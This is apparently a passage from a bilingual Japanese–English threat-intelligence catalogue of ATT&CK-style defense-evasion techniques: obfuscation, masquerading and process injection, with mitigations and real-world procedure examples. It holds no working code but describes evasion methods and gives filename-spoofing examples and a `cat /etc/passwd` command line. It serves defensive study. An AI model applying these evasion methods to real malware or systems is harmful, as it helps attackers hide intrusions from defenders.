敵対者は、ステガノグラフィを用いて画像等にコードやデータを隠すことがある。Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files. 敵対者は、配送後に標的上でソースをコンパイルし、配送時の検知を回避することがある。Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe, csc.exe, or GCC/MinGW. 敵対者は、ツールから検知指標を除去して、シグネチャ検知を回避することがある。Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems. 敵対者は、HTMLスマグリングを用いてブラウザ上で悪意あるペイロードを組み立て、配送時の検知を回避することがある。Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads. 敵対者は、APIを実行時に動的解決して、静的解析による検知を回避することがある。Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various Native API functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts. 敵対者は、シンボル等を除去（ストリップ）したペイロードを用いて解析を困難にすることがある。Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads. 敵対者は、別ファイルにペイロードを埋め込んで隠蔽することがある。Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to Subvert Trust Controls by not impacting execution controls such as digital signatures and notarization tickets. 敵対者は、コマンドラインを難読化して検知や解析を回避することがある。Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., Phishing and Drive-by Compromise) or interactively via Command and Scripting Interpreter. 敵対者は、ファイルとして残さずレジストリ等にデータを保存（ファイルレス）して検知を回避することがある。Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository. Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.. 敵対者は、LNKファイルのアイコン参照を悪用してペイロードを密かに取得することがある。Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. 敵対者は、ファイルを暗号化/エンコードして検知や解析を回避することがある。Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as Software Packing, Steganography, and Embedded Payloads, share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., Deobfuscate/Decode Files or Information) at the time of execution/use. 敵対者は、ポリモーフィックコードを用いて毎回異なる形態にし、シグネチャ検知を回避することがある。Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution. With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools. Other obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as Software Packing, Command Obfuscation, or Encrypted/Encoded File. 敵対者は、ファイルを圧縮して検知や解析を回避することがある。Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., Fileless Storage). 敵対者は、ジャンクコードを挿入して解析やシグネチャ検知を妨げることがある。Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with Compression or Software Packing. 敵対者は、SVGファイルにペイロードを隠して配送時の検知を回避することがある。Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files. SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `<script>` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files. 敵対者は、不可視Unicode文字を悪用してコマンドやデータを隠すことがある。Adversaries may abuse invisible or non-printing Unicode characters to conceal malicious content within files, scripts, or text. By inserting characters that do not visibly render, adversaries may hide data, alter how content is interpreted, or make malicious code appear as benign text or whitespace. Adversaries may encode these malicious payloads, using binary, Base64, or custom schemes, to be reconstructed at runtime through scripting features such as JavaScript Proxy traps, `eval()`, or other dynamic execution methods. This technique enables adversaries to evade visual inspection and basic static analysis by hiding malicious encoded content in innocuous text. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 エンドポイントで悪意ある挙動を検出・防止する。 システムやアカウントを監査し、不正な活動を検出する。 アンチウイルス/アンチマルウェアで悪意あるコードを検出・防止する。 難読化されたファイル/情報に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0015, the threat actors used Base64-encoded strings. During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection. During the 2016 Ukraine Electric Power Attack, Sandworm Team used heavily obfuscated code with Industroyer in its Windows Notepad backdoor. During the 3CX Supply Chain Attack, AppleJeus payloads use AES-256 GCM cipher to encrypt data to include ICONICSTEALER and VEILEDSIGNAL. Ke3chang has used Base64-encoded shellcode strings. APT3 obfuscates files or information to help evade defensive measures. Sandworm Team has used Base64 encoding within malware variants. Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments. Additionally, Gamaredon Group has used an obfuscated .drv file. BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools. APT37 obfuscates strings and payloads. Gallmaker obfuscated shellcode used during execution. GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection. Kimsuky has obfuscated binary strings including the use of XOR encryption and Base64 encoding. Kimsuky has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format. Kimsuky has obfuscated strings using Single Instruction Multiple Data (SIMD) instructions that complicate static analysis. APT41 used VMProtected binaries in multiple intrusions. APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payloads and RAT packages, and password protected encrypted email attachments to avoid detection. APT-C-36 has also compressed initial droppers into ZIP, LHA and UUE formats. Rocke has modified UPX headers after packing files to break unpackers. Windshift has used string encoding with floating point calculations. Mustang Panda has delivered initial payloads hidden using archives and encoding measures. Mustang Panda has also utilized opaque predicates in payloads to hinder analysis. BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect. Earth Lusca used Base64 to encode strings. Moonstone Sleet delivers encrypted payloads in pieces that are then combined together to form a new portable executable (PE) file during installation. RedCurl has used malware with string encryption. RedCurl has also encrypted data and has encoded PowerShell commands using Base64. RedCurl has used `PyArmor` to obfuscate code execution of LaZagne. Additionally, RedCurl has obfuscated downloaded files by renaming them as commonly used tools and has used `echo`, instead of file names themselves, to execute files. PoisonIvy hides any strings related to its own indicators of compromise. PlugX can use API hashing and modify the names of strings to evade detection. Carbanak encrypts strings to make analysis more difficult. Most of the strings in ADVSTORESHELL are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory. MiniDuke can use control flow flattening to obscure code. The DustySky dropper uses a function to obfuscate the name of functions and other parts of the malware. SHOTPUT is obscured using XOR encoding and appended to a valid GIF file. HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming. Epic heavily obfuscates its code to make analysis more difficult. Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission. A version of XTunnel introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products. Pisloader obfuscates files by splitting strings into smaller sub-strings and including "garbage" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data. ComRAT has encrypted its virtual file system using AES-256 in XTS mode. H1N1 uses multiple techniques to obfuscate strings, including XOR. CORESHELL obfuscates strings using a custom stream cipher. OLDBAIT obfuscates internal strings and unpacks them at startup. Shamoon contains base64-encoded strings. StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data. RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. POSHSPY appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download. Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata. Matryoshka obfuscates API function names using a substitute cipher combined with Base64 encoding. FinFisher is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code. Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher. ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com. PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR. PUNCHTRACK is loaded and executed by a highly obfuscated launcher. NETWIRE has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names. A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer. Hydraq uses basic obfuscation in the form of spaghetti code. Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll. ROKRAT can encrypt data prior to exfiltration by using an RSA public key. SynAck payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering. Comnie uses RC4 and Base64 to obfuscate strings. InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload. InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format. OopsIE uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. OopsIE also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings. Kazuar is obfuscated using the open source ConfuserEx protector. Kazuar also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher. TrickBot uses non-descriptive names to hide functionality. jRAT’s Java payload is encrypted with AES. Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool. Agent Tesla has had its code obfuscated in an apparent attempt to make analysis difficult. Agent Tesla has used the Rijndael symmetric encryption algorithm to encrypt strings. Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths. Remcos can also employ control flow flattening to hinder analysis. Carbon encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm. NanoCore’s plugins were obfuscated with Eazfuscater.NET 3.3. NOKKI uses Base64 encoding for strings. Denis obfuscates its code and encrypts the API names. Final1stspy obfuscates strings with base64 encoding. CoinTicker initially downloads a hidden encoded file. Ebury has obfuscated its strings with a simple XOR encryption with a static key. Dridex's strings are obfuscated using RC4. PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server. PoetRAT has used a custom encryption scheme for communication between scripts. Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2. ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key. Ryuk can use anti-disassembly and code transformation obfuscation techniques. Lokibot has obfuscated strings with base64 encoding. Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis. Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers. SDBbot has the ability to XOR the strings for its installer component with a hardcoded 128 byte key. CARROTBALL has used a custom base64 alphabet to decode files. TajMahal has used an encrypted Virtual File System to store plugins. Valak has the ability to base64 encode and XOR encrypt strings. Bundlore has obfuscated data with base64, AES, RC4, and bz2. Hancitor has used Base64 to encode malicious links. MCMD can Base64 encode output strings prior to sending to C2. Drovorub has used XOR encrypted payloads in WebSocket client to server messages. Anchor has obfuscated code with stack strings and string encryption. RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation. FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation. SoreFang has the ability to encode and RC6 encrypt data sent to C2. Pillowmint has obfuscated the AES key used for encryption. PolyglotDuke can custom encrypt strings. SUNBURST obfuscated collected system information using a FNV-1a + XOR algorithm. TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher. SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion <MsBuild.exe</code> process. Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls. AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components. ECCENTRICBANDWAGON has encrypted strings with RC4. Out1 has the ability to encode data. ShadowPad has encrypted its payload, a virtual file system, and various files. P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed. Industroyer uses heavily obfuscated code in its Windows Notepad backdoor. EKANS uses encoded strings in its process kill list. KillDisk uses VMProtect to make reverse engineering the malware more difficult. Conficker has obfuscated its code to prevent its removal from host machines. SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data. AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls. Siloscape itself is obfuscated and uses obfuscated API calls. Ecipekac can use XOR, AES, and DES to encrypt loader shellcode. Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload. SodaMaster can use "stackstrings" for obfuscation. GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings. Sliver obfuscates configuration and other static files using native Go libraries such as `garble` and `gobfuscate` to inhibit configuration analysis and static detection. BoomBox can encrypt data using AES prior to exfiltration. Avaddon has used encrypted strings. Kobalos encrypts all strings using RC4 and bundles all functionality into a single function call. Turian can use VMProtect for obfuscation. QakBot has hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells. BoxCaon used the "StackStrings" obfuscation technique to hide malicious functionalities. Diavol has Base64 encoded the RSA public key used for encrypting files. The Clambling executable has been obfuscated when dropped on a compromised host. Lizar has obfuscated the fingerprint of the victim system, the local IP address, and the Fowler-Noll-V 1 (FNV-1) hash of the local IP address using an XOR operation. The data is then sent to the C2 server. Green Lambert has encrypted strings. DRATzarus can be partly encrypted with XOR. Flagpro has been delivered within ZIP or RAR password-protected archived files. Saint Bot has been obfuscated to help avoid detection. Amadey has obfuscated strings such as antivirus vendor names, domains, files, and others. Action RAT's commands, strings, and domains can be Base64 encoded within the payload. Small Sieve has the ability to use a custom hex byte swapping encoding scheme combined with an obfuscated Base64 function to protect program strings and Telegram credentials. Bumblebee has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions. AvosLocker has used XOR-encoded strings. Brute Ratel C4 has used encrypted payload files and maintains an encrypted configuration structure in memory. SVCReady can encrypt victim data with an RC4 cipher. DarkTortilla has been obfuscated with the DeepSea .NET and ConfuserEx code obfuscators. Sardonic can use certain ConfuserEx features for obfuscation and can be encoded in a base64 string. Snip3 has the ability to obfuscate strings using XOR encryption. NightClub can obfuscate strings using the congruential generator `(LCG): staten+1 = (690069 × staten + 1) mod 232`. Samurai can encrypt the names of requested APIs. SLOWPULSE can hide malicious code in the padding regions between legitimate functions in the Pulse Secure `libdsplibs.so` file. COATHANGER can store obfuscated configuration information in the last 56 bytes of the file `/date/.bd.key/preload.so`. DarkGate uses a hard-coded string as a seed, along with the victim machine hardware identifier and input text, to generate a unique string used as an internal mutex value to evade static detection based on mutexes. BUSHWALK can encrypt the resulting data generated from C2 commands with RC4. Raspberry Robin uses mixed-case letters for filenames and commands to evade detection. The Gootloader first stage script is obfuscated using random alpha numeric strings. CHIMNEYSWEEP can use a custom Base64 alphabet to encode an API decryption key. BPFDoor can require a password to activate the backdoor and uses RC4 encryption or static library encryption `libtomcrypt`. StrelaStealer has been distributed in ISO archives. StrelaStealer has been delivered in encrypted, password-protected ZIP archives. Lumma Stealer has used SmartAssembly to obfuscate .NET payloads. BOOKWORM has been delivered using self-extracting RAR archives. PUBLOAD has obfuscated DLL names using the ror13AddHash32 algorithm. HTTPTroy has obfuscated strings using Single Instruction Multiple Data (SIMD) instructions to hinder analysis and detection. Shai-Hulud has utilized double-base64 encoding to store stolen secrets within the Github Action Logs within the victim account. Shai-Hulud has also leveraged three layers of base64 encoding of exfiltrated data for anti-forensic purposes. BRICKSTORM has utilized Go libraries to include Garble to obfuscate code. LODEINFO has used control flow flattening to obfuscate code. NOOPLDR can use control flow flattening to help hide malicious code. ANELLDR code implements anti-analysis techniques including control flow flattening and Mixed Boolean Arithmetic (MBA). Fooder has stored its embedded payload in encrypted form within the binary, using a hardcoded key modified at runtime to produce the AES decryption key. RustyWater has an obfuscated function (i.e. love_me__()) that dynamically reconstructs the string WScript.Shell using hard-coded ASCII values and the Chr() function. 敵対者は、名前や属性を正規のものに偽装して検知を回避することがある。 Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. 敵対者は、無効/偽のコード署名を付与して正規ソフトを装うことがある。Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files. 敵対者は、右から左への上書き(RLO)文字でファイル名を偽装することがある。Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. 敵対者は、悪意あるツールを正規ユーティリティ名にリネームして偽装することがある。Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython. It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths. 敵対者は、タスクやサービスを正規のものに見せかけて偽装することがある。Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones. 敵対者は、正規リソースの名前や場所に一致させてファイルを偽装することがある。Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. 敵対者は、ファイル名末尾にスペースを付けて拡張子を偽装することがある。Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. 敵対者は、二重拡張子を用いてファイル種別を偽装することがある。Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies. 敵対者は、ファイルタイプ（マジックバイト等）を偽装して検知を回避することがある。Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is <code> 0xFF 0xD8</code> and the file extension is either `.JPE`, `.JPEG` or `.JPG`. 敵対者は、プロセスツリーを分断して親子関係から検知されるのを回避することがある。An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs. 敵対者は、アカウント名を正規のものに偽装することがある。Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during Create Account, although accounts may also be renamed at a later date. This may also coincide with Account Access Removal if the actor first deletes an account before re-creating one with the same name. 敵対者は、プロセス引数を上書きして本来の起動コマンドを隠すことがある。Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc/<PID>/cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges. 敵対者は、ブラウザのフィンガープリントを偽装して検知や追跡を回避することがある。Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc. The HTTP User-Agent request header is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting user agent. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 許可されていないコードの実行を防止する。 エンドポイントで悪意ある挙動を検出・防止する。 コード署名を検証し、未署名・不正なコードの実行を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 アンチウイルス/アンチマルウェアで悪意あるコードを検出・防止する。 偽装（マスカレード）に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Honeybee, the threat actors modified the MaoCheng dropper so its icon appeared as a Word document. During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file. For Operation Dust Storm, the threat actors disguised some executables as JPG files. During C0018, AvosLocker was disguised using the victim company name as the filename. KV Botnet Activity involves changing process filename to <code>pr_set_mm_exe_file</code> and process name to <code>pr_set_name</code> during later infection stages. ArcaneDoor involved the use of digital certificates on adversary-controlled network infrastructure that mimicked the formatting used by legitimate Cisco ASA appliances. During Salesforce Data Exfiltration, threat actors used voice calls to socially engineer victims into authorizing a modified version of the Salesforce Data Loader app. APT28 has renamed the WinRAR utility to avoid detection. Sandworm Team masqueraded malicious installers as Windows update packages to evade defense and entice users to execute binaries. menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files. OilRig has used .doc file extensions to mask malicious executables. APT32 has disguised a Cobalt Strike beacon as a Flash Installer. BRONZE BUTLER has masked executables with document file icons including Word and Adobe PDF. PLATINUM has renamed rar.exe to avoid detection. Windshift has used icons mimicking MS Office files to mask malicious executables. Windshift has also attempted to hide executables by changing the file extension to ".scr" to mimic Windows screensavers. TA551 has masked malware DLLs as dat and jpg files. ZIRCONIUM has spoofed legitimate applications in phishing lures and changed file extensions to conceal installation of malware. Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface. TeamTNT has disguised their scripts with docker-related file names. LazyScripter has used several different security software icons to disguise executables. Ember Bear has renamed the legitimate Sysinternals tool procdump to alternative names such as <code>dump64.exe</code> to evade detection. Aoqin Dragon has used fake icons including antivirus and external drives to disguise malicious payloads. FIN13 has masqueraded staged data by using the Windows certutil utility to generate fake Base64 encoded certificates with the input file. Agrius used the Plink tool for tunneling and connections to remote machines, renaming it <code>systems.exe</code> in some instances. Winter Vivern created specially-crafted documents mimicking legitimate government or similar documents during phishing campaigns. Storm-1811 has prompted users to download and execute batch scripts that masquerade as legitimate update files during initial access and social engineering operations. Contagious Interview has delivered BeaverTail malware masquerading as legitimate software or applications. Contagious Interview has also delivered malicious payloads masquerading as legitimate software drivers. RTM has been delivered as archived Windows executable files masquerading as PDF documents. The TrickBot downloader has used an icon to appear as a Microsoft Word document. Bisonal dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script. NotPetya drops PsExec with the filename dllhost.dat. Ryuk can create .dll files that actually contain a Rich Text File format document. Pony has used the Adobe Reader icon for the downloaded file to look more trustworthy. Ramsay has masqueraded as a JPG image file. WindTail has used icons mimicking MS Office files to mask payloads. The Dacls Mach-O binary has been disguised as a .nib file. Raindrop was built to include a modified version of 7-Zip source code (including associated export names) and Far Manager source code. SombRAT can use a legitimate process name to hide itself. AppleSeed can disguise JavaScript files as PDFs. EnvyScout has used folder icons for malicious files to lure victims into opening them. BoomBox has the ability to mask malicious data strings as PDF files. NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system. XCSSET installs malicious application bundles that mimic native macOS apps, such as Safari, by using the legitimate app’s icon and customizing the `Info.plist` to match expected metadata. FoggyWeb can masquerade the output of C2 commands as a fake, but legitimately formatted WebP file. RCSession has used a file named English.rtf to appear benign on victim hosts. DarkWatchman has used an icon mimicking a text file to mask a malicious executable. TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection. WhisperGate has been disguised as a JPG extension to avoid detection as a malicious PE file. Flagpro can download malicious files with a .tmp extension and append them with .exe prior to execution. Milan has used an executable named `companycatalogue` to appear benign. Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection. PowGoop has disguised a PowerShell script as a .dat file (goopdate.dat). DarkTortilla's payload has been renamed `PowerShellInfo.exe`. DarkGate can masquerade as pirated media content for initial delivery to victims. UPSTYLE has masqueraded filenames using examples such as `update.py`. StrelaStealer PE executable payloads have used uncommon but legitimate extensions such as `.com` instead of `.exe`. RedLine Stealer malware has masqueraded as legitimate software such as "PDF Converter Software" which has been distributed through poisoned search engine results often resembling legitimate software lures with the combination of typo squatted domains. BeaverTail has masqueraded as MiroTalk installation packages: “MiroTalk.dmg” for macOS and “MiroTalk.msi” for Windows, and has included login GUIs with MiroTalk themes. GlassWorm has masqueraded as legitimate VSCode extensions. GlassWorm has also impersonated Github projects. DynoWiper has been named after well-known files schtask.exe, schtask2.exe, and <redacted>_update.exe. 敵対者は、正規プロセスに悪意あるコードを注入して権限昇格やステルスを行うことがある。 Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 敵対者は、正規プロセスにDLLを注入して悪意あるコードを実行することがある。Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、正規プロセスにPE（実行ファイル）を注入して実行することがある。Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、既存スレッドの実行を乗っ取ってコードを実行することがある。Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、非同期プロシージャコール(APC)を悪用してコードを注入することがある。Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、スレッドローカルストレージを悪用してコードを注入することがある。Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、ptraceシステムコールを悪用して他プロセスにコードを注入することがある。Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、/procメモリを悪用してコードを注入することがある。Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、Extra Window Memoryを悪用してコードを注入することがある。Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、プロセスハロウィングで正規プロセスの中身を悪意あるコードに置き換えることがある。Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. 敵対者は、プロセスドッペルゲンギングで検知を回避しつつコードを実行することがある。Adversaries may inject malicious code into process via process doppelgänging 